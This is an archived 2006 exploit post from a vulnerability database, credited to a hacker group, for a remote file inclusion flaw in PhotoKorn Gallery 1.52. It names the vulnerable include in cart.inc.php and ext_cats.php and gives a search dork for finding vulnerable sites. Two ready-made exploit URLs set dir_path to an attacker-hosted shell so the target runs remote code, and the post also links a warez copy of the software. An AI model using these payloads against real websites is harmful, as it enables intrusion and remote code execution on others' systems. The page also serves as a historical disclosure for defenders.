Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14203
HistorySep 09, 2006 - 12:00 a.m.

PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit

2006-09-0900:00:00
vulners.com
21

#====================================================================
#PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit
#====================================================================

#Critical Level : Dangerous

#By Saudi Hackrz

#=================================================================

#Script Name: PhotoKorn Gallery v 1.52
#Script :)
#http://warez.gtasoft.ru/skripts/PhotoKorn.Gallery.(SL).v1.52.PHP.NULL-DGT.zip

#=================================================================
#Bug in : cart.inc.php & ext_cats.php

<<<<<<<< include_once($dir_path."/footer.php");

#in <<<< includes/cart.inc.php & extras/ext_cats.php & … :)
#=================================================================

#Dork : photokorn 1.52

#Exploit :
#--------------------------------

#http://sitename.com/[path]/includes/cart.inc.php?dir_path=http://SHELLURL.COM?
#or
#http://sitename.com/[path]/extras/ext_cats.php?dir_path=http://SHELLURL.COM?
#===============================================================================
#Discoverd By : Saudi Hackrz

#Conatact : Saudi.unix[at]hotmail.com

#GreetZ :All My Frind
#www.S3hr.com . www.xp10.com . www.3asfh.net . www.lezr.com .www.king18.org
#===============================================================================